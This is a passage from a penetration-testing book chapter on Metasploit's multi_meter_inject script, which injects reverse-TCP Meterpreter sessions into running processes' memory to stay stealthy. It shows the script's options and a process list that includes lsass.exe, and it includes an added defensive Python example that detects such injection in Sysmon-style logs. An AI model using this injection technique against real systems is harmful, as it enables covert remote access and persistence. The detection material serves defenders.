236
Chapter 16
different processes. To begin, take a look at this script in Meterpreter to see what flags and syntax are included:
meterpreter > run multi_meter_inject -h
Meterpreter script for injecting a reverse tcp Meterpreter payload into memory space of
multiple PID's. If none is provided, notepad.exe will be spawned and the meterpreter
payload injected into it.

OPTIONS:

    -h          Help menu.
    -m          Start Exploit multi/handler for return connection
    -mp <opt>   Provide Multiple PID for connections separated by comma one per IP.
    -mr <opt>   Provide Multiple IP Addresses for Connections separated by comma.
    -p  <opt>   The port on the remote host where Metasploit is listening (default: 4444)
    -pt <opt>   Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp

meterpreter >
The first option is the -m flag, which automatically sets up a new handler for us on the return connection. We would not need to set this option if the new sessions were going to come back on the port of a handler we already have listening (for example, 443). Next we specify the process IDs (PIDs) into which the new shells will be injected. Meterpreter executes in memory only. When we inject into a process, we are injecting Meterpreter into the memory space of that process. This allows us to remain stealthy, never reading or writing files to disk, while ultimately having multiple shells available to us.
We then set the IP address and port number on the attacking machine to which we want the new Meterpreter sessions to connect.
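Because the injected Meterpreter never touches disk, the host-level traces a defender can still look for are the thread created in another process and the outbound connection from the injected process back to the handler. The following is an added example, not code from the book or from Metasploit: it runs two such rules over constructed, Sysmon-style event lines (EventID 8 for remote thread creation, EventID 3 for network connections); the field names, the no-network image list and the handler-port list are assumptions to adapt to your own telemetry.

```python
import re

# Images that should never initiate outbound TCP (assumption: tune per environment).
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe"}
# Default multi/handler port from the script's help text; extend with known ones.
HANDLER_PORTS = {4444}

def parse_event(line):
    """Turn one 'key=value key=value' line into a dict (values contain no spaces)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def analyse(lines):
    """Return (event_id, pid, reason) for every line that trips a rule."""
    hits = []
    for line in lines:
        e = parse_event(line)
        if e.get("EventID") == "8":
            src, dst = basename(e["SourceImage"]), basename(e["TargetImage"])
            # A thread created inside a different image is the hallmark of injection.
            if src != dst:
                hits.append((8, e["TargetProcessId"], f"remote thread from {src} into {dst}"))
        elif e.get("EventID") == "3":
            image = basename(e["Image"])
            port = int(e["DestinationPort"])
            if image in NO_NETWORK_IMAGES:
                hits.append((3, e["ProcessId"], f"{image} opened outbound TCP to port {port}"))
            elif port in HANDLER_PORTS:
                hits.append((3, e["ProcessId"], f"{image} connected to handler port {port}"))
    return hits

# Constructed sample events (not real telemetry); addresses are from TEST-NET ranges.
SAMPLE = [
    r"EventID=8 SourceProcessId=2808 SourceImage=C:\Windows\iexplorer.exe TargetProcessId=524 TargetImage=C:\Windows\System32\lsass.exe",
    r"EventID=8 SourceProcessId=364 SourceImage=C:\Windows\System32\csrss.exe TargetProcessId=424 TargetImage=C:\Windows\System32\csrss.exe",
    r"EventID=3 ProcessId=3120 Image=C:\Windows\System32\notepad.exe DestinationIp=192.0.2.10 DestinationPort=443",
    r"EventID=3 ProcessId=524 Image=C:\Windows\System32\lsass.exe DestinationIp=192.0.2.10 DestinationPort=4444",
    r"EventID=3 ProcessId=4000 Image=C:\Windows\System32\svchost.exe DestinationIp=198.51.100.7 DestinationPort=443",
]

if __name__ == "__main__":
    for eid, pid, why in analyse(SAMPLE):
        print(f"EventID {eid} PID {pid}: {why}")
```

Note that the notepad.exe connection is flagged even on port 443, which is why an image allow-list catches sessions that a port rule alone would miss.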
We issue the ps command within Meterpreter to get a list of running processes:
meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User  Path
 ---   ----              ----  -------  ----  ----
 0     [System Process]
 4     System
 256   smss.exe
 364   csrss.exe
 412   wininit.exe
 424   csrss.exe
 472   winlogon.exe
 516   services.exe
 524   lsass.exe
 532   lsm.exe
 2808  iexplorer.exe     x86

meterpreter >